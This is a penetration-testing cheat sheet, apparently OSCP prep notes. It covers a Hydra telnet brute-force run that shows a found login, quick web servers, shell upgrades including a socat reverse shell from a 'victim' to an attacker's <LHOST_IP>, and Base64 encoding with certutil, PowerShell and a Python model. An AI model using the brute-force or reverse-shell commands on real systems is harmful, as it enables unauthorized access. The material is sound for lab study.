Tricks

Some tricks that can be useful for getting a shell.

Hydra

c:\PENTEST\thc-hydra>hydra -L username.txt -P passlist.txt 10.10.10.xx telnet
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-03-03 19:19:13
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:6/p:0), ~4 tries per task
[DATA] attacking telnet://10.10.10.xx:23/
[23][telnet] host: 10.10.10.98 login: admin password: secretpw
[STATUS] 24.00 tries/min, 24 tries in 00:00h, 0 to do in 01:00h, 1 active
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-03-03 19:20:18

Simple web server

  • You can set up a simple web server using Python or PHP.
    • Python:
      python -m SimpleHTTPServer 8080

      A simple HTTP server will then be listening on TCP port 8080. (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 8080.)

    • PHP:
      php -S 127.0.0.1:8080

      A simple HTTP server will then be listening on 127.0.0.1:8080.

Upgrading shells

  • Python with “pty”:
    python -c "import pty; pty.spawn('/bin/bash')"

  • Socat

    On your localhost (attacker):

    socat file:`tty`,raw,echo=0 tcp-listen:443

    On your victim:

    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST_IP>:443

Base64

Base64 encoding is used in quite a few places and there are many online web sites that let you encode or decode Base64. I am not very comfortable using such sites for security and privacy reasons, so I went looking for alternative solutions. Whether you’re using Linux, Windows or macOS, you can use built-in tools to both encode and decode Base64 data. So ditch any online sites and start using software that is installed locally on your computer. Here’s how.

You will need to do all of this via the command line. Given you’re already dealing with Base64 data I am going to assume you know how to bring that up on your operating system. Scroll down to the relevant section based on your OS below, also substitute your file names as appropriate.

I am going to use .txt for the decoded data file extension and .b64 for the Base64 encoded file extension.

Linux

Encode a data file to Base64:

base64 data.txt > data.b64

Decode a Base64 file:

base64 -d data.b64 > data.txt

Windows

Encode a data file to Base64:

certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64

Decode a Base64 file:

certutil -decode data.b64 data.txt

Note: certutil -encode wraps its output in PEM-style -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines; the findstr /v /c:- step drops every line containing a hyphen, which removes exactly those two lines because the standard Base64 alphabet contains no hyphen. Encoding with the above command will leave a temporary file, tmp.b64, on your file system. If you do not wish to have that file present, simply add this to the end of the command: && del tmp.b64

PowerShell can also encode a file's bytes to a single Base64 string without the wrapper lines:

PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes( "C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>
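As an added example (not from the page or from the certutil/findstr/base64 tools themselves), the Python below models the Windows certutil + findstr pipeline above and a decoder that accepts output from any of the tools on this page, so you can see why the hyphen filter works and what it silently assumes. The certutil output shape (PEM-style header and footer, 64-column lines, CRLF) is an assumption of the model; the sample file contents are the ones the page's PowerShell example encodes.

```python
import base64

# Constructed sample input: the same file contents the page's PowerShell
# example encodes (a Windows text file, hence the CRLF line ending).
SECRET = b"dit bestand is geheim\r\ngroetjes Puck"

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"


def certutil_encode(data: bytes) -> str:
    """Model of `certutil -encode` output (assumption: PEM-style header and
    footer, 64-character lines, CRLF line endings)."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([BEGIN, *lines, END]) + "\r\n"


def findstr_strip(text: str) -> str:
    """Model of `findstr /v /c:- tmp.b64`: keep only lines containing no '-'.
    This works only because the standard Base64 alphabet (A-Z, a-z, 0-9, +, /)
    has no hyphen; URL-safe Base64 (RFC 4648 section 5) uses '-' and '_' and
    would lose whole lines to this filter."""
    kept = [ln for ln in text.splitlines() if "-" not in ln]
    return "\r\n".join(kept) + "\r\n"


def decode_b64_file(text: str) -> bytes:
    """Decode Base64 text as produced by any tool on this page: GNU `base64`
    output (76-column lines, LF), certutil output with its wrapper lines, or
    the findstr-filtered file. Wrapper lines are dropped, whitespace removed,
    and validate=True makes non-Base64 input raise instead of being skipped."""
    body = "".join(ln.strip() for ln in text.splitlines() if "-" not in ln)
    return base64.b64decode(body, validate=True)


if __name__ == "__main__":
    wrapped = certutil_encode(SECRET)
    print(wrapped, end="")                 # what certutil writes to tmp.b64
    print(findstr_strip(wrapped), end="")  # what ends up in data.b64
    print(decode_b64_file(wrapped))        # round trip back to the bytes
```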

Interesting links to read!

https://blog.ropnop.com/transferring-files-from-kali-to-windows/ (A lot of techniques to transfer files from attacker machine to a windows box)
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ (Upgrading simple shells techniques)

https://github.com/RustyShackleford221/OSCP-Prep